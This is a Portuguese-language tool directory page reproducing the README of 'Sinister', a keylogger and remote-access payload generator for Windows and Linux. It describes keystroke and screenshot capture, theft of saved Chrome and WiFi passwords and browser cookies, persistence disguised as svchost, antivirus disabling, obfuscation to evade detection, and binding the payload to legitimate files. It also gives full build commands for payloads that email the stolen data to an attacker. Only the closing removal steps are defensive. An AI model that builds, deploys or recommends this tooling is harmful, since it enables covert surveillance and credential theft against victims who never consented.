Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Sinister — Sinister é um Gerador de Keylogger para Windows/Linux que envia logs de teclas por e-mail com outras informações interessantes do alvo. | Kitploit
Ferramentas/GitHubGitHub/pushpenderindia/sinister
Quebra de SenhasGeração de PayloadsMecanismos de PersistênciaExfiltração de DadosColeta de InformaçõesPós-ExploraçãoRed TeamingFerramenta de Acesso Remoto
GitHubpushpenderindia/sinister

Sinister

Sinister é um Gerador de Keylogger para Windows/Linux que envia logs de teclas por e-mail com outras informações interessantes do alvo.

Ver Repositório
46593há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sinister Logo

Sinister

Hacker GIF

root@kitploit:~
                    Este pequeno script Python pode fazer um trabalho realmente incrível.

Sinister é um Gerador de Keylogger para Windows/Linux, que envia logs de teclas e capturas de tela por e-mail, juntamente com outras informações interessantes da vítima, escrito em Python 3.

Aviso Legal

:computer: Este projeto foi criado apenas para bons propósitos e uso pessoal.

ESTE SOFTWARE É FORNECIDO "COMO ESTÁ", SEM GARANTIA DE QUALQUER TIPO. VOCÊ PODE USAR ESTE SOFTWARE POR SUA CONTA E RISCO. O USO É DE TOTAL RESPONSABILIDADE DO USUÁRIO FINAL. OS DESENVOLVEDORES NÃO ASSUMEM NENHUMA RESPONSABILIDADE E NÃO SÃO RESPONSÁVEIS POR QUALQUER USO INDEVIDO OU DANO CAUSADO POR ESTE PROGRAMA.

Funcionalidades

  • Funciona em Windows/Linux
  • Notificar nova vítima por e-mail
  • Indetectável
  • Persistência
  • Validação das credenciais de e-mail antes da geração do payload.
  • Pode receber logs de teclas em qualquer provedor de e-mail, como GMAIL, YAHOO, OUTLOOK, SMTP personalizado.
  • Servidor/Porta SMTP
Nome do ServidorServidor SMTPPorta SMTP
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Envia captura de tela da tela do PC da vítima por e-mail
  • Cria binário executável com zero dependências
  • Cria payload de tamanho reduzido ~5mb com funcionalidades avançadas
  • Ofusca o payload antes de gerá-lo, ignorando assim alguns antivírus
  • O payload gerado é codificado com base64, dificultando extremamente a engenharia reversa
  • Função para matar o Antivírus no PC da vítima e tentar desabilitar a segurança
  • Interface colorida incrível para gerar payload
  • No lado do atacante: ao criar o payload, o script detecta automaticamente dependências ausentes e as instala
  • Diferencia os dados de log com base no nome da janela ativa (Veja a imagem para melhor compreensão)
  • Capacidade de adicionar ícone personalizado ao arquivo malicioso
  • Agregador embutido que pode agregar o keylogger a qualquer arquivo [.pdf, .txt, .exe etc], executando o arquivo legítimo na frente e os códigos maliciosos em segundo plano como serviço.
  • Verifica se já existe instância em execução no sistema. Se encontrada, apenas o arquivo legítimo é executado [ para evitar recebimento de logs de e-mail duplicados].
O agregador embutido pode roubar estas coisas:
Navegador Chrome (senhas salvas)
WiFi (senhas salvas)
Cookies do Chrome (dados de login, cookies, histórico)
Cookies do Firefox (cookies.sqlite)

Nota: O agregador personalizado é codificado, não depende do LaZagne

  • Coleta e envia informações úteis do dispositivo da vítima
Estas coisas são coletadas e enviadas:
Sistema Operacional
Nome do Computador
Nome de Usuário
IPv4 Público
  • Se o seu payload não conseguir executar, use --debug para executar o exe em primeiro plano com CMD

Importante

Em 30 de maio de 2022, o Google removeu o recurso de aplicativos menos seguros, portanto, em vez da senha do Gmail:

  • Ative a 2FA no seu Gmail atacante
  • Crie uma senha específica de aplicativo
  • Use essa senha específica de aplicativo ao criar o payload.
  • Como criar senha específica de aplicativo: Clique aqui

Testado em

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Pré-requisitos

  • Python 3.X
  • Alguns módulos externos

Como usar no Linux

root@kitploit:~
# Navegue até o diretório /opt (opcional)
$ cd /opt/

# Clone este repositório
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Navegue até a pasta Sinister
$ cd Sinister

# Instalando dependências
$ bash installer_linux.sh

*** Nota: Quando a caixa de diálogo do instalador do Python aparecer durante a execução do installer_linux.sh ***
    * Clique em instalação personalizada
    * Selecione Caminho para: C:/Python37-32
    ### Para que o Python seja instalado neste caminho (dentro do Wine): ~/.wine/drive_c/Python37-32

# Se você estiver tendo erros ao executar o installer_linux.sh, tente instalar usando o installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Criando Payload/RAT
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do GMAIL, configuração de porta (Servidor SMTP padrão = smtp.gmail.com, Porta SMTP padrão = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do OUTLOOK, configuração de porta
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do YAHOO, configuração de porta
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Nota: Você também pode usar nossos ícones personalizados da pasta icon, basta usá-los assim --icon icon/pdf.ico

Como usar no Windows

root@kitploit:~
# Instale as dependências
$ Instale o Python 3.x mais recente

# Clone este repositório
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Entre no repositório
$ cd Sinister

# Instalando dependências
$ python -m pip install -r requirements.txt

# Abra Sinister.py no editor de texto e configure a linha 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Obtendo menu de ajuda
$ python Sinister.py --help

# Criando Payload/RAT
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do GMAIL, configuração de porta (Servidor SMTP padrão = smtp.gmail.com, Porta SMTP padrão = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass-w -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do OUTLOOK, configuração de porta
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do YAHOO, configuração de porta
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

Nota: Você também pode usar nossos ícones personalizados da pasta icon, basta usá-los assim --icon icon/pdf.ico

Como Atualizar

  • Execute updater.py para atualizar automaticamente ou baixe o ZIP mais recente deste repositório do GitHub
  • Nota: Git deve estar instalado para usar o updater.py

Nota:- O arquivo malicioso será salvo dentro da pasta dist/, dentro da pasta Sinister/

Argumentos Disponíveis

  • Argumentos Opcionais

Nota: Deve ser especificado -w/--windows ou -l/--linux

  • Argumentos Obrigatórios

Novas Capturas de Tela:

Obtendo Ajuda

Gerando Payload

Obtendo Relatório

Dados de Log Diferenciados com Base no Nome da Janela Ativa ~ Funcionalidade Adicionada na v1.3 e posteriores

Recupera e Envia Senhas Salvas do Navegador Chrome

  • Nota: Para usar esta funcionalidade, especifique -s ou --steal-password ao criar o keylogger

Recupera e Envia Senhas Salvas do WIFI

  • Nota: Para usar esta funcionalidade, especifique -s ou --steal-password ao criar o keylogger

Consulte também estas imagens antigas

~Capturas de Tela Antigas:

Obtendo Ajuda

Executando o Script Sinister.py

Construção Finalizada

Quando o Keylogger executa, ele adiciona registro para se tornar persistente

Cria uma cópia de si mesmo e a salva dentro de Roaming

Digitando texto aleatório para testar o Keylogger

Relatório 1 enviado pelo Sinister

Login no facebook ~ Vítima

Relatório 2 - Logs de teclas das credenciais do Facebook

Relatório 3 - Com Capturas de Tela

Problemas de Depuração

Tente executar o Keylogger Offline para testar a captura de logs de teclas offline e depurar problemas do keylogger executando estes comandos:

Execute test_key.py em ambos os modos [Compilado & Raw] e descubra qual é o erro

Execute assim: python test_key.py

Também compile assim: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

Após executá-lo, comece a digitar algo, O resultado será exibido no prompt de comando a cada 10 segundos

Os arquivos do keylogger offline estão na pasta TestKeylogger

  • Se o payload não conseguir executar no sistema da vítima
root@kitploit:~
1. Crie um novo payload com a flag --debug
2. Execute o payload exe através do cmd [Não execute o payload clicando duas vezes]
3. Agora ele dará um erro mais apropriado no CMD, apenas coloque esse problema na seção de Issues

Removendo o Sinister no Windows:

Método 1:

  • Vá em Iniciar, digite regedit e execute o primeiro programa, isso abrirá o editor de registro.
  • Navegue até o seguinte caminho Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Deve haver uma entrada chamada svchost, clique com o botão direito nessa entrada e selecione Excluir.
  • Vá para o caminho do seu usuário > AppData > Roaming, você verá um arquivo chamado “svchost.exe”, este é o RAT, clique com o botão direito > Excluir.
  • Reinicie o sistema.

Método 2:

  • Execute "RemoveSinister.bat" no sistema infectado e reinicie o PC para parar o arquivo malicioso atualmente em execução.

Removendo o Sinister no Linux:

  • Abra o arquivo Autostart com qualquer editor de texto, Caminho do Arquivo Autostart: ~/.config/autostart/xinput.desktop

  • Remova estas 5 linhas:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Nota: destination_file_name é o nome que você deu ao arquivo malicioso usando o parâmetro -o

  • Reinicie o sistema e exclua o arquivo malicioso armazenado neste caminho abaixo

  • Caminho de destino, onde o Keylogger está armazenado: ~/.config/xnput

Contribuidores

  • Lista de Contribuidores Dedicados: Contribuidores

Contribuições de qualquer tipo são bem-vindas!

NOTA: Se você deveria estar na lista de contribuidores, mas nós esquecemos, por favor nos avise!

TODO

  • Sugira sua própria funcionalidade
  • Adicionar novas funcionalidades
  • Contribuir com a Versão GUI
Baixar ferramenta
Proibidor de Múltiplas Instâncias
  • O atacante pode criar/compilar para Windows/Linux usando sistema Linux, mas só pode criar/compilar executável Windows usando máquina Windows
  • Recupera senhas salvas do sistema da vítima e as envia para o atacante.
  • AbreviaçãoCompletoDescrição
    -h--helpmostra esta mensagem de ajuda e sai
    -i INTERVAL--interval INTERVALTempo entre relatórios em segundos. padrão=120
    -t TIME_PERSISTENT--persistence TIME_PERSISTENTTornar-se persistente após __ segundos. padrão=10
    -x SMTP_Server--smtpServidor SMTP personalizado. padrão="smtp.gmail.com"
    -y SMTP_Port--portPorta SMTP personalizada. padrão=587
    -w--windowsGera um executável Windows.
    -l--linuxGera um executável Linux.
    -s--steal-passwordRouba senhas salvas da máquina da vítima [SO Suportado: Windows]
    -b file.txt--bind LEGITIMATE_FILE_PATH.pdfAgregador automático: Especifique o caminho do arquivo legítimo. [SO Suportado: Windows]
    -d--debugO Payload será executado em primeiro plano com janela CMD, para obter erro de execução apropriado
    AbreviaçãoCompletoDescrição
    --icon ICONEspecifica o caminho do ícone, ícone do arquivo malicioso [Nota: Deve ser .ico]
    -e EMAIL--email EMAILEndereço de e-mail para enviar relatórios.
    -p PASSWORD--password PASSWORDSenha para o endereço de e-mail fornecido no argumento -e.
    -o OUT--out OUTNome do arquivo de saída.

    Pushpender Singh

    :computer:

    Thomas Kunwar

    :computer:

    krasnova19

    :computer:

    sarchish5

    :computer:

    chiragcode11

    :computer:

    C4RR0T02

    :computer: